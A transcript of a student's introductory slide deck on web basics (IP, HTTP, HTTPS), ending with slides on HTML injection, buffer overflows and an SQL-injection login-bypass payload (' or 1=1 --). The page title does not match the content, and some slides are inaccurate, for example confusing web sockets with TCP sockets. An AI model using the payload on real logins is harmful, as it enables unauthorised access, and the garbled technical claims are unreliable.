Hacking the Sun Certified Enterprise Architect Exam – Part 1
Web Hacking Series Part 1
-
Upload
aditya-kamat -
Category
Education
-
view
84 -
download
0
Transcript of Web Hacking Series Part 1
![Page 1: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/1.jpg)
~ Aditya Kamat
BMS College of Engineering
WEB HACKING SERIES PART-1
![Page 2: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/2.jpg)
WEBSITE?
• It is a collection of related web pages.
• Web pages consist of text or multimedia content.
• Can have a domain name.
• Can be accessible over the internet or LAN.
• URL(Uniform Resource Locator) is used to identify the site.
![Page 3: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/3.jpg)
PROTOCOL?
• Set of rules which are used for communication.
• We will look at:
• IP (Internet Protocol)
• HTTP (Hyper Text Transfer Protocol)
• HTTPS (Hyper Text Transfer Protocol Secure)
![Page 4: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/4.jpg)
IP (INTERNET PROTOCOL)
• It has two versions:
• IPv4 (32 bits)
• IPv6 (128 bits)
• IPv4 is the most used one currently.
• IP address is assigned to each client in a network and it is unique for each client.
• Example: 192.168.0.1, 110.211.2.65
![Page 5: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/5.jpg)
PUBLIC IP ADDRESS
• It is given by the ISP (Internet Service provider) for each connection.
• This is unique for every connection on the internet.
• IANA (Internet Assigned Numbers Authority) gives a range of IP addresses to the ISP and the ISP then gives them to their clients. In this way, the IP address of two clients is never the same.
![Page 6: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/6.jpg)
PRIVATE IP ADDRESS
• These are assigned to us by the routers present in our home.
• This type of IP address is used when all devices are on the same network.
• All devices in the same network will have different private IP address but the same public address.
• The first octet of private IP address is 10 or 172 or 192
![Page 7: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/7.jpg)
PUBLIC VS PRIVATE IP ADDRESS
Source: http://bharath-marrivada.blogspot.in/
![Page 8: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/8.jpg)
HTTP (HYPER TEXT TRANSFER PROTOCOL)• Three versions:
• HTTP/1.0
• HTTP/1.1
• HTTP/2
• HTTP functions as a request–response protocol in the client–server computing model.
• The client submits an HTTP request message to the server.
• The server, which provides resources such as HTML files and other content, or performs other functions on behalf of the client, returns a response message to the client.
![Page 9: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/9.jpg)
STATUS CODE• 200 OK• 301 MOVED PERMANENTLY
• 302 FOUND• 304 NOT MODIFIED (Used by proxies/caches to check if
data is modified)• 400 BAD REQUEST (Caused by client side error)• 401 UNAUTHORIZED• 403 FORBIDDEN• 404 NOT FOUND
Source: https://en.wikipedia.org/wiki/List_of_HTTP_status_codes
![Page 10: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/10.jpg)
HTTP METHODS
• GET • HEAD• POST• PUT • DELETE• TRACE
![Page 11: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/11.jpg)
GET METHOD
• It is used to retrieve entities/objects from web servers.
• Conditional get is used by web caches to check if data is modified.
![Page 12: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/12.jpg)
POST METHOD
• Parameters are passed in the message body.
• More secure than Get method.
Source: studytonight.com
![Page 13: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/13.jpg)
WEB SOCKETS
• It is a combination of IP address and port address.
• It is used by the web server to identify unique hosts.
• Each client is assigned a socket by a server through which it can communicate with the server.
• Server uses the concept of multi-threading to create many sockets.
![Page 14: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/14.jpg)
HTTPS
• HTTP over SSL(Secure Sockets layer)
• Default Port number 443.
• Main intention is to transfer data securely.
• In many websites, it is implemented only whenever secret data (Payment info) is to be transferred.
• It is much slower than HTTP/1.1
![Page 15: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/15.jpg)
ENOUGH OF THEORY, LET US START ATTACKING ;)
![Page 16: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/16.jpg)
VULNERABILITIES WE WILL BE LOOKING AT:-
• HTML injection.
• SQL injection to bypass authentication.
• Buffer overflow attack.
![Page 17: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/17.jpg)
HTML INJECTION• HTML tags are used to change the data that is inputted into the
form.
• It can also be used in the URL while sending data in the form of parameters.
• Data is modified to take benefit of this vulnerability.
• Hackers usually try to steal account credentials as we will see in the demo.
![Page 18: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/18.jpg)
A FEW HTML TAGS• <b> - To make the text bold.
• <i> - To italicize the text.
• <form> - To create a form.
• <input> - To create each element of the form.
• <table> - To create a table. <td> and <tr> are used to create rows and columns.
![Page 19: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/19.jpg)
SQL INJECTION TO BYPASS AUTHENTICATION.
• Main intention here is to login without knowing the username and password.
• Single or double quote is used to end the string and the statement/query inserted after that will be executed.
Source : learn.digilentic.com
![Page 20: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/20.jpg)
QUERY / STATEMENT
• ‘ or 1=1 –-
• Even if the username or password entered is not true, the result of the statement will be true because right side of OR is true.
• Hence, We are allowed to login as the desired user.
![Page 21: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/21.jpg)
BUFFER OVERFLOW• It is a memory based attack on the server.
• If the input is not validated, the memory of the server can be filled up with junk values.
• It is used to completely exhaust the resources of the server.
• An user defined function can also be executed after the buffer is filled.
![Page 22: Web Hacking Series Part 1](https://reader034.fdocuments.in/reader034/viewer/2022051318/587cb2d01a28ab38028b5091/html5/thumbnails/22.jpg)
THANK YOU